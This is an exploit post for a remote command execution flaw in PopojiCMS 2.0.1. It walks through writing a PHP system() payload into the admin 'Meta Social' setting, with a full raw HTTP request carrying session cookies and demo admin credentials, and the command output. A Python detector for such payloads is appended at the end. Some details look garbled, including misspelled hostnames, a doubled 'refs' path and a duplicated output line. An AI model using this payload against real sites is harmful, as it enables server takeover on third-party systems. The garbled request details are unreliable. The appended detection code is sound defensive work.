PopojiCMS version 2.0.1 - Remote Command Execution

# Exploit Title: PopojiCMS version 2.0.1 Remote Command Execution
# Date: 27/11/2023
# Exploit Author: TMRSWRR
# Vendor Homepage: https://www.popojicms.org/
# Software Link: https://github.com/popojicms/popojicms/archive/refs/refs/tags/v2.0.1.zip
# Version: 2.0.1
# Tested on: https://www.softaculous.com/apps/cms/popojicms
## POC:
1) Log in as admin and click Settings.
2) Click Config and write the payload into Meta Social: <?php echo system('id'); ?>
3) Open the main page; you will see the result of the id command.
POST /popojicms9zl3dxwbzt/po-admin/route.php?mod=setTingAct=spersocial HTTP/1.1
host: demos5.softaculous.com
cookie: _ga_yydpz3nxqq=GS1.1.1.1701095610.3.1.1701096569.0.0.0; _GA=GA1.1.386621536.1701082112; aefcookies1526 [aefsid]=3cbt9mdj1kpi06aj1q5r8yhtgouteb5s; phpsessid=b6f1f9beefcec94f09824efa9dae9847; lang=gb; demo_563=%7B%22sid%22%3A563%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22password%22%2C%22url%22%3A%22http%3A%5C%2F%5C%2Fdemos5.softaculous.com%5C%2FPopojiCMS9z L3DXWBZT%22%2C%22Adminurl%22%3A%22HTTP%3A%5C%2F%5C%2FDEMOS5.Softaculy.com%%5C%2FP OpoJicms9ZL3DXWBZT%5C%2FPO-ADMIN%5C%2F%2F%22%2C%22dir_suffix%22%3A%229ZL3DXWBZT%22%22%7D
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://demos5.softaculul.com/POPOJICMS9ZL3DXWBZT/PO-ADMIN/ADMIN/ADMIN.PHP?mod=setting
Content-Type: application/x-www-form-urlencoded
Content-Length: 58
Origin: https://demos5.softaculous.com
DNT: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
TE: trailers
Connection: close

meta_content=%3C%3Fphp+echo+system%28%27id%27%29%3B+%3F%3E

Result:
uid=1000(soft) gid=1000(soft) groups=1000(soft) uid=1000(soft) gid=1000(soft) groups=1000(soft)
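
A defensive check for the request above, as an added example that is not part of the original post: it decodes form bodies submitted to the settings endpoint and flags a meta_content value that carries a PHP open tag. The watched field name comes from the captured request; the function names, the decode bound and the second and third sample bodies are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, unquote_plus

# Any PHP open tag (<?php, <?=, bare <?) or the legacy <script language="php"> form.
PHP_TAG = re.compile(r'<\?|<script[^>]*\blanguage\s*=\s*["\']?php', re.IGNORECASE)

MAX_DECODE_ROUNDS = 3  # assumption: how many layers of nested percent-encoding to unwrap


def fully_decode(value):
    """URL-decode repeatedly so %253C%253Fphp is caught as well as %3C%3Fphp."""
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_php_in_form(body, fields=("meta_content",)):
    """Return {field: decoded value} for watched form fields containing a PHP open tag."""
    hits = {}
    for name, values in parse_qs(body, keep_blank_values=True).items():
        if name not in fields:
            continue
        for raw in values:
            decoded = fully_decode(raw)
            if PHP_TAG.search(decoded):
                hits[name] = decoded
    return hits


SAMPLES = [
    # Body of the request shown in the post.
    "meta_content=%3C%3Fphp+echo+system%28%27id%27%29%3B+%3F%3E",
    # Constructed: harmless PHP tag, upper-cased and percent-encoded twice.
    "meta_content=%253C%253FPHP%2520echo%25201%253B%2520%253F%253E",
    # Constructed: an ordinary meta tag, which is what the field is meant to hold.
    "meta_content=%3Cmeta+property%3D%22og%3Atitle%22+content%3D%22Home%22%3E",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(find_php_in_form(sample) or "clean")
```

The same pattern can be run over the stored Meta Social value on disk or in the database, since the payload persists after the request and executes on every home page load.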